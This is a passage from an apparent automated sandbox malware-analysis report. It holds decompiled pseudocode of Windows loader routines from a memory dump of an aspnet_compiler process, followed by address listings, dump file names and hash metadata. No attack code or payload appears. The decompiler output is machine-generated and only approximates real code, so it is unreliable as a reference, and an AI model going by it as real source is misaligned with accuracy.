														_t342 =  *(_t353 + 0x18);
														E0121E974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
													}
													if( *0x1288472 != 0) {
														_v192 = 0;
														_t342 =  *0x7ffe0330;
														_t361 =  *0x128b218; // 0x0
														asm("ror edi, cl");
														 *0x128b1e0( &_v192, _t353, _v168, 0, _v180);
														 *(_t361 ^  *0x7ffe0330)();
														_t269 = _v192;
														_t353 = _v176;
														__eflags = _t269;
														if(__eflags != 0) {
															_v168 = _t269;
														}
													}
												}
											}
											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
												_t366 = 0xc000007a;
											}
											_t247 =  *(_t353 + 0x50);
											if(_t247[3] == 0xffffffff) {
												L40:
												if(_t366 == 0xc000007a) {
													__eflags = _t288;
													if(_t288 == 0) {
														goto L136;
													} else {
														_t366 = 0xc0000139;
													}
													goto L54;
												}
											} else {
												_t249 =  *_t247;
												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
													goto L40;
												} else {
													_t250 = _t249 | 0xffffffff;
													asm("lock xadd [edi+0x9c], eax");
													if((_t249 | 0xffffffff) == 0) {
														E011B2280(_t250, 0x12884d8);
														_t342 =  *(_t353 + 0x54);
														_t165 = _t353 + 0x54; // 0x54
														_t252 = _t165;
														__eflags =  *(_t342 + 4) - _t252;
														if( *(_t342 + 4) != _t252) {
															L135:
															asm("int 0x29");
															L136:
															_t288 = _v200;
															_t366 = 0xc0000138;
															L54:
															_t342 = _t288;
															L011D3898(0, _t288, _t366);
														} else {
															_t324 =  *(_t252 + 4);
															__eflags =  *_t324 - _t252;
															if( *_t324 != _t252) {
																goto L135;
															} else {
																 *_t324 = _t342;
																 *(_t342 + 4) = _t324;
																_t293 =  *(_t353 + 0x50);
																_v180 =  *_t293;
																E011AFFB0(_t293, _t353, 0x12884d8);
																__eflags =  *((short*)(_t353 + 0x3a));
																if( *((short*)(_t353 + 0x3a)) != 0) {
																	_t342 = 0;
																	__eflags = 0;
																	E011D37F5(_t353, 0);
																}
																E011D0413(_t353);
																_t256 =  *(_t353 + 0x48);
																__eflags = _t256;
																if(_t256 != 0) {
																	__eflags = _t256 - 0xffffffff;
																	if(_t256 != 0xffffffff) {
																		E011C9B10(_t256);
																	}
																}
																__eflags =  *(_t353 + 0x28);
																if( *(_t353 + 0x28) != 0) {
																	_t174 = _t353 + 0x24; // 0x24
																	E011C02D6(_t174);
																}
																L011B77F0( *0x1287b98, 0, _t353);
																__eflags = _v180 - _t293;
																if(__eflags == 0) {
																	E011CC277(_t293, _t366);
																}
																_t288 = _v164;
																goto L40;
															}
														}
													} else {
														goto L40;
													}
												}
											}
										}
									} else {
										L011AEC7F(_t353);
										L011C19B8(_t287, 0, _t353, 0);
										_t200 = E0119F4E3(__eflags);
										continue;
									}
								}
								L41:
								if(_v157 != 0) {
									L011B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
								}
								if(_t366 < 0) {
									L46:
									 *_v212 = _v168;
									_t204 = _t366;
									L47:
									_pop(_t354);
									_pop(_t367);
									_pop(_t289);
									return E011DB640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
								} else {
									_t206 =  *0x128b2f8; // 0x0
									if((_t206 |  *0x128b2fc) == 0 || ( *0x128b2e4 & 0x00000001) != 0) {
										goto L46;
									} else {
										_t297 =  *0x128b2ec; // 0x0
										_v200 = 0;
										if((_t297 >> 0x00000008 & 0x00000003) == 3) {
											_t355 = _v168;
											_t342 =  &_v208;
											_t208 = E01246B68(_v168,  &_v208, _v168, __eflags);
											__eflags = _t208 - 1;
											if(_t208 == 1) {
												goto L46;
											} else {
												__eflags = _v208 & 0x00000010;
												if((_v208 & 0x00000010) == 0) {
													goto L46;
												} else {
													_t342 = 4;
													_t366 = E01246AEB(_t355, 4,  &_v216);
													__eflags = _t366;
													if(_t366 >= 0) {
														goto L46;
													} else {
														asm("int 0x29");
														_t356 = 0;
														_v44 = 0;
														_t290 = _v52;
														__eflags = 0;
														if(0 == 0) {
															L108:
															_t356 = 0;
															_v44 = 0;
															goto L63;
														} else {
															__eflags = 0;
															if(0 < 0) {
																goto L108;
															}
															L63:
															_v112 = _t356;
															__eflags = _t356;
															if(_t356 == 0) {
																L143:
																_v8 = 0xfffffffe;
																_t211 = 0xc0000089;
															} else {
																_v36 = 0;
																_v60 = 0;
																_v48 = 0;
																_v68 = 0;
																_v44 = _t290 & 0xfffffffc;
																E011AE9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
																_t306 = _v68;
																__eflags = _t306;
																if(_t306 == 0) {
																	_t216 = 0xc000007b;
																	_v36 = 0xc000007b;
																	_t307 = _v60;
																} else {
																	__eflags = _t290 & 0x00000001;
																	if(__eflags == 0) {
																		_t349 =  *(_t306 + 0x18) & 0x0000ffff;
																		__eflags = _t349 - 0x10b;
																		if(_t349 != 0x10b) {
																			__eflags = _t349 - 0x20b;
																			if(_t349 == 0x20b) {
																				goto L102;
																			} else {
																				_t307 = 0;
																				_v48 = 0;
																				_t216 = 0xc000007b;
																				_v36 = 0xc000007b;
																				goto L71;
																			}
																		} else {
																			L102:
																			_t307 =  *(_t306 + 0x50);
																			goto L69;
																		}
																		goto L151;
																	} else {
																		_t239 = L011AEAEA(_t290, _t290, _t356, _t366, __eflags);
																		_t307 = _t239;
																		_v60 = _t307;
																		_v48 = _t307;
																		__eflags = _t307;
																		if(_t307 != 0) {
																			L70:
																			_t216 = _v36;
																		} else {
																			_push(_t239);
																			_push(0x14);
																			_push( &_v144);
																			_push(3);
																			_push(_v44);
																			_push(0xffffffff);
																			_t319 = E011D9730();
																			_v36 = _t319;
																			__eflags = _t319;
																			if(_t319 < 0) {
																				_t216 = 0xc000001f;
																				_v36 = 0xc000001f;
																				_t307 = _v60;
																			} else {
																				_t307 = _v132;
																				L69:
																				_v48 = _t307;
																				goto L70;
																			}
																		}
																	}
																}
																L71:
																_v72 = _t307;
																_v84 = _t216;
																__eflags = _t216 - 0xc000007b;
																if(_t216 == 0xc000007b) {
																	L150:
																	_v8 = 0xfffffffe;
																	_t211 = 0xc000007b;
																} else {
																	_t344 = _t290 & 0xfffffffc;
																	_v76 = _t344;
																	__eflags = _v40 - _t344;
																	if(_v40 <= _t344) {
																		goto L150;
																	} else {
																		__eflags = _t307;
																		if(_t307 == 0) {
																			L75:
																			_t217 = 0;
																			_v104 = 0;
																			__eflags = _t366;
																			if(_t366 != 0) {
																				__eflags = _t290 & 0x00000001;
																				if((_t290 & 0x00000001) != 0) {
																					_t217 = 1;
																					_v104 = 1;
																				}
																				_t290 = _v44;
																				_v52 = _t290;
																			}
																			__eflags = _t217 - 1;
																			if(_t217 != 1) {
																				_t369 = 0;
																				_t218 = _v40;
																				goto L91;
																			} else {
																				_v64 = 0;
																				E011AE9C0(1, _t290, 0, 0,  &_v64);
																				_t309 = _v64;
																				_v108 = _t309;
																				__eflags = _t309;
																				if(_t309 == 0) {
																					goto L143;
																				} else {
																					_t226 =  *(_t309 + 0x18) & 0x0000ffff;
																					__eflags = _t226 - 0x10b;
																					if(_t226 != 0x10b) {
																						__eflags = _t226 - 0x20b;
																						if(_t226 != 0x20b) {
																							goto L143;
																						} else {
																							_t371 =  *(_t309 + 0x98);
																							goto L83;
																						}
																					} else {
																						_t371 =  *(_t309 + 0x88);
																						L83:
																						__eflags = _t371;
																						if(_t371 != 0) {
																							_v80 = _t371 - _t356 + _t290;
																							_t310 = _v64;
																							_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
																							_t292 =  *(_t310 + 6) & 0x0000ffff;
																							_t311 = 0;
																							__eflags = 0;
																							while(1) {
																								_v120 = _t311;
																								_v116 = _t348;
																								__eflags = _t311 - _t292;
																								if(_t311 >= _t292) {
																									goto L143;
																								}
																								_t359 =  *((intOrPtr*)(_t348 + 0xc));
																								__eflags = _t371 - _t359;
																								if(_t371 < _t359) {
																									L98:
																									_t348 = _t348 + 0x28;
																									_t311 = _t311 + 1;
																									continue;
																								} else {
																									__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
																									if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
																										goto L98;
																									} else {
																										__eflags = _t348;
																										if(_t348 == 0) {
																											goto L143;
																										} else {
																											_t218 = _v40;
																											_t312 =  *_t218;
																											__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
																											if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
																												_v100 = _t359;
																												_t360 = _v108;
																												_t372 = L011A8F44(_v108, _t312);
																												__eflags = _t372;
																												if(_t372 == 0) {
																													goto L143;
																												} else {
																													_t290 = _v52;
																													_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E011D3C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
																													_t307 = _v72;
																													_t344 = _v76;
																													_t218 = _v40;
																													goto L91;
																												}
																											} else {
																												_t290 = _v52;
																												_t307 = _v72;
																												_t344 = _v76;
																												_t369 = _v80;
																												L91:
																												_t358 = _a4;
																												__eflags = _t358;
																												if(_t358 == 0) {
																													L95:
																													_t308 = _a8;
																													__eflags = _t308;
																													if(_t308 != 0) {
																														 *_t308 =  *((intOrPtr*)(_v40 + 4));
																													}
																													_v8 = 0xfffffffe;
																													_t211 = _v84;
																												} else {
																													_t370 =  *_t218 - _t369 + _t290;
																													 *_t358 = _t370;
																													__eflags = _t370 - _t344;
																													if(_t370 <= _t344) {
																														L149:
																														 *_t358 = 0;
																														goto L150;
																													} else {
																														__eflags = _t307;
																														if(_t307 == 0) {
																															goto L95;
																														} else {
																															__eflags = _t370 - _t344 + _t307;
																															if(_t370 >= _t344 + _t307) {
																																goto L149;
																															} else {
																																goto L95;
																															}
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																								goto L97;
																							}
																						}
																						goto L143;
																					}
																				}
																			}
																		} else {
																			__eflags = _v40 - _t307 + _t344;
																			if(_v40 >= _t307 + _t344) {
																				goto L150;
																			} else {
																				goto L75;
																			}
																		}
																	}
																}
															}
															L97:
															 *[fs:0x0] = _v20;
															return _t211;
														}
													}
												}
											}
										} else {
											goto L46;
										}
									}
								}
								goto L151;
							}
							_t288 = _v164;
							_t366 = 0xc0000135;
							goto L41;
						}
					}
				}
				L151:
			}








































































































                                                                                        0x011ad5f2
                                                                                        0x011ad5f5
                                                                                        0x011ad5f5
                                                                                        0x011ad5fd
                                                                                        0x011ad600
                                                                                        0x011ad60a
                                                                                        0x011ad60d
                                                                                        0x011ad617
                                                                                        0x011ad61d
                                                                                        0x011ad627
                                                                                        0x011ad62e
                                                                                        0x011ad911
                                                                                        0x011ad913
                                                                                        0x00000000
                                                                                        0x011ad919
                                                                                        0x011ad919
                                                                                        0x011ad919
                                                                                        0x011ad634
                                                                                        0x011ad634
                                                                                        0x011ad634
                                                                                        0x011ad634
                                                                                        0x011ad640
                                                                                        0x011ad8bf
                                                                                        0x00000000
                                                                                        0x011ad646
                                                                                        0x011ad646
                                                                                        0x011ad64d
                                                                                        0x011ad652
                                                                                        0x011fb2fc
                                                                                        0x011fb2fc
                                                                                        0x011fb302
                                                                                        0x011fb33b
                                                                                        0x011fb341
                                                                                        0x00000000
                                                                                        0x011fb304
                                                                                        0x011fb304
                                                                                        0x011fb319
                                                                                        0x011fb31e
                                                                                        0x011fb324
                                                                                        0x011fb326
                                                                                        0x011fb332
                                                                                        0x011fb347
                                                                                        0x011fb34c
                                                                                        0x011fb351
                                                                                        0x011fb35a
                                                                                        0x00000000
                                                                                        0x011fb328
                                                                                        0x011fb328
                                                                                        0x00000000
                                                                                        0x011fb328
                                                                                        0x011fb326
                                                                                        0x011ad658
                                                                                        0x011ad658
                                                                                        0x011ad65b
                                                                                        0x011ad665
                                                                                        0x00000000
                                                                                        0x011ad66b
                                                                                        0x011ad66b
                                                                                        0x011ad66b
                                                                                        0x011ad66b
                                                                                        0x011ad66d
                                                                                        0x011ad672
                                                                                        0x011ad67a
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x011ad680
                                                                                        0x011ad686
                                                                                        0x011ad8ce
                                                                                        0x011ad8d4
                                                                                        0x011ad8dd
                                                                                        0x011ad8e0
                                                                                        0x011ad68c
                                                                                        0x011ad691
                                                                                        0x011ad69d
                                                                                        0x011ad6a2
                                                                                        0x011ad6a7
                                                                                        0x011ad6b0
                                                                                        0x011ad6b5
                                                                                        0x011ad6e0
                                                                                        0x011ad6b7
                                                                                        0x011ad6b7
                                                                                        0x011ad6b9
                                                                                        0x011ad6b9
                                                                                        0x011ad6bb
                                                                                        0x011ad6bd
                                                                                        0x011ad6ce
                                                                                        0x011ad6d0
                                                                                        0x011ad6d2
                                                                                        0x011fb363
                                                                                        0x011fb365
                                                                                        0x00000000
                                                                                        0x011fb36b
                                                                                        0x00000000
                                                                                        0x011fb36b
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x011ad6bf
                                                                                        0x011ad6bf
                                                                                        0x011ad6e5
                                                                                        0x011ad6e7
                                                                                        0x011ad6e9
                                                                                        0x011ad6ec
                                                                                        0x011ad6ec
                                                                                        0x011ad6ef
                                                                                        0x011ad6f5
                                                                                        0x011ad6f9
                                                                                        0x011ad6fb
                                                                                        0x011ad6fd
                                                                                        0x011ad701
                                                                                        0x011ad703
                                                                                        0x011ad70a
                                                                                        0x011ad70a
                                                                                        0x011ad701
                                                                                        0x011ad710
                                                                                        0x011ad710
                                                                                        0x011ad6c1
                                                                                        0x011ad6c1
                                                                                        0x011ad6c6
                                                                                        0x011fb36d
                                                                                        0x011fb36f
                                                                                        0x00000000
                                                                                        0x011fb375
                                                                                        0x011fb375
                                                                                        0x011fb375
                                                                                        0x00000000
                                                                                        0x011fb375
                                                                                        0x00000000
                                                                                        0x011ad6cc
                                                                                        0x011ad6d8
                                                                                        0x011ad6d8
                                                                                        0x011ad6d8
                                                                                        0x00000000
                                                                                        0x011ad6c6
                                                                                        0x011ad6bf
                                                                                        0x00000000
                                                                                        0x011ad6da
                                                                                        0x011ad6da
                                                                                        0x011ad716
                                                                                        0x011ad71b
                                                                                        0x011ad720
                                                                                        0x011ad726
                                                                                        0x011ad726
                                                                                        0x011ad72d
                                                                                        0x00000000
                                                                                        0x011ad733
                                                                                        0x011ad739
                                                                                        0x011ad742
                                                                                        0x011ad750
                                                                                        0x011ad758
                                                                                        0x011ad764
                                                                                        0x011ad776
                                                                                        0x011ad77a
                                                                                        0x011ad783
                                                                                        0x011ad928
                                                                                        0x011ad92c
                                                                                        0x011ad93d
                                                                                        0x011ad944
                                                                                        0x011ad94f
                                                                                        0x011ad954
                                                                                        0x011ad956
                                                                                        0x011ad95f
                                                                                        0x011ad961
                                                                                        0x011ad973
                                                                                        0x011ad973
                                                                                        0x011ad956
                                                                                        0x011ad944
                                                                                        0x011ad92c
                                                                                        0x011ad78b
                                                                                        0x011fb394
                                                                                        0x011ad791
                                                                                        0x011ad798
                                                                                        0x011fb3a3
                                                                                        0x011fb3bb
                                                                                        0x011fb3bb
                                                                                        0x011ad7a5
                                                                                        0x011ad866
                                                                                        0x011ad870
                                                                                        0x011ad884
                                                                                        0x011ad892
                                                                                        0x011ad898
                                                                                        0x011ad89e
                                                                                        0x011ad8a0
                                                                                        0x011ad8a6
                                                                                        0x011ad8ac
                                                                                        0x011ad8ae
                                                                                        0x011ad8b4
                                                                                        0x011ad8b4
                                                                                        0x011ad8ae
                                                                                        0x011ad7a5
                                                                                        0x011ad78b
                                                                                        0x011ad7b1
                                                                                        0x011fb3c5
                                                                                        0x011fb3c5
                                                                                        0x011ad7c3
                                                                                        0x011ad7ca
                                                                                        0x011ad7e5
                                                                                        0x011ad7eb
                                                                                        0x011ad8eb
                                                                                        0x011ad8ed
                                                                                        0x00000000
                                                                                        0x011ad8f3
                                                                                        0x011ad8f3
                                                                                        0x011ad8f3
                                                                                        0x00000000
                                                                                        0x011ad8ed
                                                                                        0x011ad7cc
                                                                                        0x011ad7cc
                                                                                        0x011ad7d2
                                                                                        0x00000000
                                                                                        0x011ad7d4
                                                                                        0x011ad7d4
                                                                                        0x011ad7d7
                                                                                        0x011ad7df
                                                                                        0x011fb3d4
                                                                                        0x011fb3d9
                                                                                        0x011fb3dc
                                                                                        0x011fb3dc
                                                                                        0x011fb3df
                                                                                        0x011fb3e2
                                                                                        0x011fb468
                                                                                        0x011fb46d
                                                                                        0x011fb46f
                                                                                        0x011fb46f
                                                                                        0x011fb475
                                                                                        0x011ad8f8
                                                                                        0x011ad8f9
                                                                                        0x011ad8fd
                                                                                        0x011fb3e8
                                                                                        0x011fb3e8
                                                                                        0x011fb3eb
                                                                                        0x011fb3ed
                                                                                        0x00000000
                                                                                        0x011fb3ef
                                                                                        0x011fb3ef
                                                                                        0x011fb3f1
                                                                                        0x011fb3f4
                                                                                        0x011fb3fe
                                                                                        0x011fb404
                                                                                        0x011fb409
                                                                                        0x011fb40e
                                                                                        0x011fb410
                                                                                        0x011fb410
                                                                                        0x011fb414
                                                                                        0x011fb414
                                                                                        0x011fb41b
                                                                                        0x011fb420
                                                                                        0x011fb423
                                                                                        0x011fb425
                                                                                        0x011fb427
                                                                                        0x011fb42a
                                                                                        0x011fb42d
                                                                                        0x011fb42d
                                                                                        0x011fb42a
                                                                                        0x011fb432
                                                                                        0x011fb436
                                                                                        0x011fb438
                                                                                        0x011fb43b
                                                                                        0x011fb43b
                                                                                        0x011fb449
                                                                                        0x011fb44e
                                                                                        0x011fb454
                                                                                        0x011fb458
                                                                                        0x011fb458
                                                                                        0x011fb45d
                                                                                        0x00000000
                                                                                        0x011fb45d
                                                                                        0x011fb3ed
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x011ad7df
                                                                                        0x011ad7d2
                                                                                        0x011ad7ca
                                                                                        0x011fb37c
                                                                                        0x011fb37e
                                                                                        0x011fb385
                                                                                        0x011fb38a
                                                                                        0x00000000
                                                                                        0x011fb38a
                                                                                        0x011ad742
                                                                                        0x011ad7f1
                                                                                        0x011ad7f8
                                                                                        0x011fb49b
                                                                                        0x011fb49b
                                                                                        0x011ad800
                                                                                        0x011ad837
                                                                                        0x011ad843
                                                                                        0x011ad845
                                                                                        0x011ad847
                                                                                        0x011ad84a
                                                                                        0x011ad84b
                                                                                        0x011ad84e
                                                                                        0x011ad857
                                                                                        0x011ad802
                                                                                        0x011ad802
                                                                                        0x011ad80d
                                                                                        0x00000000
                                                                                        0x011ad818
                                                                                        0x011ad818
                                                                                        0x011ad824
                                                                                        0x011ad831
                                                                                        0x011fb4a5
                                                                                        0x011fb4ab
                                                                                        0x011fb4b3
                                                                                        0x011fb4b8
                                                                                        0x011fb4bb
                                                                                        0x00000000
                                                                                        0x011fb4c1
                                                                                        0x011fb4c1
                                                                                        0x011fb4c8
                                                                                        0x00000000
                                                                                        0x011fb4ce
                                                                                        0x011fb4d4
                                                                                        0x011fb4e1
                                                                                        0x011fb4e3
                                                                                        0x011fb4e5
                                                                                        0x00000000
                                                                                        0x011fb4eb
                                                                                        0x011fb4f0
                                                                                        0x011fb4f2
                                                                                        0x011adac9
                                                                                        0x011adacc
                                                                                        0x011adacf
                                                                                        0x011adad1
                                                                                        0x011add78
                                                                                        0x011add78
                                                                                        0x011adcf2
                                                                                        0x00000000
                                                                                        0x011adad7
                                                                                        0x011adad9
                                                                                        0x011adadb
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x011adae1
                                                                                        0x011adae1
                                                                                        0x011adae4
                                                                                        0x011adae6
                                                                                        0x011fb4f9
                                                                                        0x011fb4f9
                                                                                        0x011fb500
                                                                                        0x011adaec
                                                                                        0x011adaec
                                                                                        0x011adaf5
                                                                                        0x011adaf8
                                                                                        0x011adafb
                                                                                        0x011adb03
                                                                                        0x011adb11
                                                                                        0x011adb16
                                                                                        0x011adb19
                                                                                        0x011adb1b
                                                                                        0x011fb52c
                                                                                        0x011fb531
                                                                                        0x011fb534
                                                                                        0x011adb21
                                                                                        0x011adb21
                                                                                        0x011adb24
                                                                                        0x011adcd9
                                                                                        0x011adce2
                                                                                        0x011adce5
                                                                                        0x011add6a
                                                                                        0x011add6d
                                                                                        0x00000000
                                                                                        0x011add73
                                                                                        0x011fb51a
                                                                                        0x011fb51c
                                                                                        0x011fb51f
                                                                                        0x011fb524
                                                                                        0x00000000
                                                                                        0x011fb524
                                                                                        0x011adce7
                                                                                        0x011adce7
                                                                                        0x011adce7
                                                                                        0x00000000
                                                                                        0x011adce7
                                                                                        0x00000000
                                                                                        0x011adb2a
                                                                                        0x011adb2c
                                                                                        0x011adb31
                                                                                        0x011adb33
                                                                                        0x011adb36
                                                                                        0x011adb39
                                                                                        0x011adb3b
                                                                                        0x011adb66
                                                                                        0x011adb66
                                                                                        0x011adb3d
                                                                                        0x011adb3d
                                                                                        0x011adb3e
                                                                                        0x011adb46
                                                                                        0x011adb47
                                                                                        0x011adb49
                                                                                        0x011adb4c
                                                                                        0x011adb53
                                                                                        0x011adb55
                                                                                        0x011adb58
                                                                                        0x011adb5a
                                                                                        0x011fb50a
                                                                                        0x011fb50f
                                                                                        0x011fb512
                                                                                        0x011adb60
                                                                                        0x011adb60
                                                                                        0x011adb63
                                                                                        0x011adb63
                                                                                        0x00000000
                                                                                        0x011adb63
                                                                                        0x011adb5a
                                                                                        0x011adb3b
                                                                                        0x011adb24
                                                                                        0x011adb69
                                                                                        0x011adb69
                                                                                        0x011adb6c
                                                                                        0x011adb6f
                                                                                        0x011adb74
                                                                                        0x011fb557
                                                                                        0x011fb557
                                                                                        0x011fb55e
                                                                                        0x011adb7a
                                                                                        0x011adb7c
                                                                                        0x011adb7f
                                                                                        0x011adb82
                                                                                        0x011adb85
                                                                                        0x00000000
                                                                                        0x011adb8b
                                                                                        0x011adb8b
                                                                                        0x011adb8d
                                                                                        0x011adb9b
                                                                                        0x011adb9b
                                                                                        0x011adb9d
                                                                                        0x011adba0
                                                                                        0x011adba2
                                                                                        0x011adba4
                                                                                        0x011adba7
                                                                                        0x011adba9
                                                                                        0x011adbae
                                                                                        0x011adbae
                                                                                        0x011adbb1
                                                                                        0x011adbb4
                                                                                        0x011adbb4
                                                                                        0x011adbb7
                                                                                        0x011adbba
                                                                                        0x011adcd2
                                                                                        0x011adcd4
                                                                                        0x00000000
                                                                                        0x011adbc0
                                                                                        0x011adbc0
                                                                                        0x011adbd2
                                                                                        0x011adbd7
                                                                                        0x011adbda
                                                                                        0x011adbdd
                                                                                        0x011adbdf
                                                                                        0x00000000
                                                                                        0x011adbe5
                                                                                        0x011adbe5
                                                                                        0x011adbee
                                                                                        0x011adbf1
                                                                                        0x011fb541
                                                                                        0x011fb544
                                                                                        0x00000000
                                                                                        0x011fb546
                                                                                        0x011fb546
                                                                                        0x00000000
                                                                                        0x011fb546
                                                                                        0x011adbf7
                                                                                        0x011adbf7
                                                                                        0x011adbfd
                                                                                        0x011adbfd
                                                                                        0x011adbff
                                                                                        0x011adc0b
                                                                                        0x011adc15
                                                                                        0x011adc1b
                                                                                        0x011adc1d
                                                                                        0x011adc21
                                                                                        0x011adc21
                                                                                        0x011adc23
                                                                                        0x011adc23
                                                                                        0x011adc26
                                                                                        0x011adc29
                                                                                        0x011adc2b
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x011adc31
                                                                                        0x011adc34
                                                                                        0x011adc36
                                                                                        0x011adcbf
                                                                                        0x011adcbf
                                                                                        0x011adcc2
                                                                                        0x00000000
                                                                                        0x011adc3c
                                                                                        0x011adc41
                                                                                        0x011adc43
                                                                                        0x00000000
                                                                                        0x011adc45
                                                                                        0x011adc45
                                                                                        0x011adc47
                                                                                        0x00000000
                                                                                        0x011adc4d
                                                                                        0x011adc4d
                                                                                        0x011adc50
                                                                                        0x011adc52
                                                                                        0x011adc55
                                                                                        0x011adcfa
                                                                                        0x011adcfe
                                                                                        0x011add08
                                                                                        0x011add0a
                                                                                        0x011add0c
                                                                                        0x00000000
                                                                                        0x011add12
                                                                                        0x011add15
                                                                                        0x011add2d
                                                                                        0x011add2f
                                                                                        0x011add32
                                                                                        0x011add35
                                                                                        0x00000000
                                                                                        0x011add35
                                                                                        0x011adc5b
                                                                                        0x011adc5b
                                                                                        0x011adc5e
                                                                                        0x011adc61
                                                                                        0x011adc64
                                                                                        0x011adc67
                                                                                        0x011adc67
                                                                                        0x011adc6a
                                                                                        0x011adc6c
                                                                                        0x011adc8e
                                                                                        0x011adc8e
                                                                                        0x011adc91
                                                                                        0x011adc93
                                                                                        0x011adcce
                                                                                        0x011adcce
                                                                                        0x011adc95
                                                                                        0x011adc9c
                                                                                        0x011adc6e
                                                                                        0x011adc72
                                                                                        0x011adc75
                                                                                        0x011adc77
                                                                                        0x011adc79
                                                                                        0x011fb551
                                                                                        0x011fb551
                                                                                        0x00000000
                                                                                        0x011adc7f
                                                                                        0x011adc7f
                                                                                        0x011adc81
                                                                                        0x00000000
                                                                                        0x011adc83
                                                                                        0x011adc86
                                                                                        0x011adc88
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x011adc88
                                                                                        0x011adc81
                                                                                        0x011adc79
                                                                                        0x011adc6c
                                                                                        0x011adc55
                                                                                        0x011adc47
                                                                                        0x011adc43
                                                                                        0x00000000
                                                                                        0x011adc36
                                                                                        0x011adc23
                                                                                        0x00000000
                                                                                        0x011adbff
                                                                                        0x011adbf1
                                                                                        0x011adbdf
                                                                                        0x011adb8f
                                                                                        0x011adb92
                                                                                        0x011adb95
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x011adb95
                                                                                        0x011adb8d
                                                                                        0x011adb85
                                                                                        0x011adb74
                                                                                        0x011adc9f
                                                                                        0x011adca2
                                                                                        0x011adcb0
                                                                                        0x011adcb0
                                                                                        0x011adad1
                                                                                        0x011fb4e5
                                                                                        0x011fb4c8
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x011ad831
                                                                                        0x011ad80d
                                                                                        0x00000000
                                                                                        0x011ad800
                                                                                        0x011fb47f
                                                                                        0x011fb485
                                                                                        0x00000000
                                                                                        0x011fb485
                                                                                        0x011ad665
                                                                                        0x011ad652
                                                                                        0x00000000

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID: DebugPrintTimes
                                                                                        • String ID:
                                                                                        • API String ID: 3446177414-0
                                                                                        • Opcode ID: b31630ef596b585ed704c67fc72c74666c4eebee4843d9d0519268b49493a36a
                                                                                        • Instruction ID: c579ac3da51e693b2550d521312bd2f12877df61ee2aab7231c36201786b8ef4
                                                                                        • Opcode Fuzzy Hash: b31630ef596b585ed704c67fc72c74666c4eebee4843d9d0519268b49493a36a
                                                                                        • Instruction Fuzzy Hash: B8E1F338A05A59CFEF3DCF98D844BA9BFB2BF45308F45019DDA0957691D730A981CB42
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 011C513A Relevance: 1.8, APIs: 1, Instructions: 258timeCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 67%
                                                                                        			E011C513A(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				signed char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v63;
				char _v64;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed char* _v92;
				signed int _v100;
				signed int _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t157;
				signed int _t159;
				signed int _t160;
				unsigned int* _t161;
				intOrPtr _t165;
				signed int _t172;
				signed char* _t181;
				intOrPtr _t189;
				intOrPtr* _t200;
				signed int _t202;
				signed int _t203;
				char _t204;
				signed int _t207;
				signed int _t208;
				void* _t209;
				intOrPtr _t210;
				signed int _t212;
				signed int _t214;
				signed int _t221;
				signed int _t222;
				signed int _t226;
				intOrPtr* _t232;
				signed int _t233;
				signed int _t234;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr _t240;
				void* _t245;
				signed int _t246;
				signed int _t247;
				void* _t248;
				void* _t251;
				void* _t252;
				signed int _t253;
				signed int _t255;
				signed int _t256;

				_t255 = (_t253 & 0xfffffff8) - 0x6c;
				_v8 =  *0x128d360 ^ _t255;
				_v32 = _v32 & 0x00000000;
				_t251 = __edx;
				_t237 = __ecx;
				_t212 = 6;
				_t245 =  &_v84;
				_t207 =  *((intOrPtr*)(__ecx + 0x48));
				_v44 =  *((intOrPtr*)(__edx + 0xc8));
				_v48 = __ecx;
				_v36 = _t207;
				_t157 = memset(_t245, 0, _t212 << 2);
				_t256 = _t255 + 0xc;
				_t246 = _t245 + _t212;
				if(_t207 == 2) {
					_t247 =  *(_t237 + 0x60);
					_t208 =  *(_t237 + 0x64);
					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
					_t159 =  *((intOrPtr*)(_t237 + 0x58));
					_v104 = _t159;
					_v76 = _t159;
					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
					_v100 = _t160;
					_v72 = _t160;
